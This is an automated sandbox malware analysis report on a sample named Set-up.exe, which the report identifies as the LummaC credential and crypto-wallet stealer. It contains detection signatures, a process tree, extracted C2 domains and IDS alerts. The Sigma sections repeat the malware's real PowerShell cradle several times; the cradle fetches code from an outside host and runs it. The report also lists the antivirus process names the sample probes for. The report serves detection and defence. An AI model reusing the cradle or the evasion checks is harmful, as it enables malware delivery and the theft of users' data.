Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1584511
MD5:17f0ea252818b24ed314f8a2443a4de4
SHA1:db02cbfcea69820422a6012603c962c2648c9038
SHA256:110a88cbc097e36f9e570af2e82c22a599acc9d9e2cd1d32b531c9f712217c7d
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Set-up.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 17F0EA252818B24ED314F8A2443A4DE4)
    • powershell.exe (PID: 6172 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 00ARFM6VTY24MGI8KNPL04W8K1.exe (PID: 5672 cmdline: "C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
      • 00ARFM6VTY24MGI8KNPL04W8K1.tmp (PID: 3568 cmdline: "C:\Users\user\AppData\Local\Temp\is-89T31.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp" /SL5="$F029A,7785838,845824,C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
        • 00ARFM6VTY24MGI8KNPL04W8K1.exe (PID: 2180 cmdline: "C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • 00ARFM6VTY24MGI8KNPL04W8K1.tmp (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\is-0IS8O.tmp\00ARFM6VTY24MGI8KNPL04W8K1.tmp" /SL5="$10029A,7785838,845824,C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
            • timeout.exe (PID: 4408 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 6148 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6360 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3468 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 6832 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7140 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 7164 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 3796 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6408 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 4936 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7112 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 6432 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 6428 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 7156 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7160 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 4940 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 5184 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 4464 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 692 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • BrightLib.exe (PID: 2176 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["abruptyopsn.shop", "noisycuttej.shop", "rabidcowse.shop", "cloudewahsj.shop", "shockingrefle.click", "nearycrepso.shop", "tirepublicerj.shop", "framekgirus.shop", "wholersorie.shop"], "Build id": "hRjzG3--DNO"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1889930772.0000000000961000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1886496911.00000000009B4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1863772475.00000000009B4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1874172879.00000000009B4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000002.2016953700.00000000008A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
              • 0x525e7:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
              Click to see the 4 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell Download and Execution Cradles
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 7160, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, ProcessId: 6172, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 7160, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, ProcessId: 6172, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 7160, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, ProcessId: 6172, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 7160, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, ProcessId: 6172, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 7160, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, ProcessId: 6172, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 7160, ParentProcessName: Set-up.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Y, ProcessId: 6172, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:08:21.473777+010020283713Unknown Traffic192.168.2.449748104.21.21.63443TCP
              2025-01-05T18:08:22.455675+010020283713Unknown Traffic192.168.2.449750104.21.21.63443TCP
              2025-01-05T18:08:23.558002+010020283713Unknown Traffic192.168.2.449751104.21.21.63443TCP
              2025-01-05T18:08:24.778979+010020283713Unknown Traffic192.168.2.449752104.21.21.63443TCP
              2025-01-05T18:08:25.892738+010020283713Unknown Traffic192.168.2.449753104.21.21.63443TCP
              2025-01-05T18:08:27.381402+010020283713Unknown Traffic192.168.2.449754104.21.21.63443TCP
              2025-01-05T18:08:28.599661+010020283713Unknown Traffic192.168.2.449755104.21.21.63443TCP
              2025-01-05T18:08:30.097347+010020283713Unknown Traffic192.168.2.449756104.21.21.63443TCP
              2025-01-05T18:08:31.574321+010020283713Unknown Traffic192.168.2.449757185.161.251.21443TCP
              2025-01-05T18:08:32.353536+010020283713Unknown Traffic192.168.2.449758172.67.208.58443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:08:21.980917+010020546531A Network Trojan was detected192.168.2.449748104.21.21.63443TCP
              2025-01-05T18:08:22.893251+010020546531A Network Trojan was detected192.168.2.449750104.21.21.63443TCP
              2025-01-05T18:08:30.874830+010020546531A Network Trojan was detected192.168.2.449756104.21.21.63443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:08:21.980917+010020498361A Network Trojan was detected192.168.2.449748104.21.21.63443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:08:22.893251+010020498121A Network Trojan was detected192.168.2.449750104.21.21.63443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:08:32.720799+010020084381A Network Trojan was detected172.67.208.58443192.168.2.449758TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:08:28.012510+010020480941Malware Command and Control Activity Detected192.168.2.449754104.21.21.63443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://cegu.shop/8574262446/ph.txtk5Avira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/Avira URL Cloud: Label: malware
              Found malware configuration
              Source: Set-up.exe.7160.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["abruptyopsn.shop", "noisycuttej.shop", "rabidcowse.shop", "cloudewahsj.shop", "shockingrefle.click", "nearycrepso.shop", "tirepublicerj.shop", "framekgirus.shop", "wholersorie.shop"], "Build id": "hRjzG3--DNO"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\00ARFM6VTY24MGI8KNPL04W8K1.exeReversingLabs: Detection: 73%
              Multi AV Scanner detection for submitted file
              Source: Set-up.exeVirustotal: Detection: 12%Perma Link
              Source: Set-up.exeReversingLabs: Detection: 15%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.4% probability
              Source: Set-up.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.21.63:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49758 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49754 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49756 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49750 -> 104.21.21.63:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 104.21.21.63:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: shockingrefle.click
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewIP Address: 172.67.208.58 172.67.208.58
